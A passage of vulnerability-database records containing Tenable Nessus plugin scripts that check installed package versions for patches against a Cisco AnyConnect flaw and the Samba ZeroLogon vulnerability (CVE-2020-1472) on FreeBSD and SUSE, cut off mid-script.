script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1237\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Based on vendor advisory\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(427);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:anyconnect_secure_mobility_client\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_anyconnect_vpn_installed.nasl\");\n script_require_keys(\"installed_sw/Cisco AnyConnect Secure Mobility Client\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Cisco AnyConnect Secure Mobility Client', port:port, win_local:TRUE);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\nconstraints = [\n { 'fixed_version' : '4.9.04043.0', 'fixed_display' : 'See vendor advisory' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T06:20:09", "description": "The Samba Team reports :\n\nAn unauthenticated attacker on the network can gain administrator\naccess by exploiting a netlogon protocol flaw.", "edition": 4, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-09-21T00:00:00", "title": "FreeBSD : samba -- Unauthenticated domain takeover via netlogon (24ace516-fad7-11ea-8d8c-005056a311d1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:samba412", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:samba410", "p-cpe:/a:freebsd:freebsd:samba411"], "id": "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "href": "https://www.tenable.com/plugins/nessus/140677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(140677);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/08\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n\n script_name(english:\"FreeBSD : samba -- Unauthenticated domain takeover via netlogon (24ace516-fad7-11ea-8d8c-005056a311d1)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Samba Team reports :\n\nAn unauthenticated attacker on the network can gain administrator\naccess by exploiting a netlogon protocol flaw.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2020-1472.html\");\n # https://vuxml.freebsd.org/freebsd/24ace516-fad7-11ea-8d8c-005056a311d1.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e92322b7\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba410\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba411\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba412\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/21\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba410<4.10.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba411<4.11.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba412<4.12.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-14T06:30:14", "description": "This update for samba fixes the following issues :\n\nUpdate to 4.10.18\n\nZeroLogon: An elevation of privilege was possible with some non\ndefault configurations when an attacker established a vulnerable\nNetlogon secure channel connection to a domain controller, using the\nNetlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 3, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-09T00:00:00", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2720-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1472"], "modified": "2020-12-09T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python3", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo"], "id": "SUSE_SU-2020-2720-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143655", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2720-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143655);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2020-1472\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2720-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for samba fixes the following issues :\n\nUpdate to 4.10.18\n\nZeroLogon: An elevation of privilege was possible with some non\ndefault configurations when an attacker established a vulnerable\nNetlogon secure channel connection to a domain controller, using the\nNetlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-1472/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202720-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9b504ef0\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2020-2720=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2020-2720=1\n\nSUSE Linux Enterprise High Availability 12-SP5 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP5-2020-2720=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-4.10.18+git.208.88201368c52-3.17.1\")) 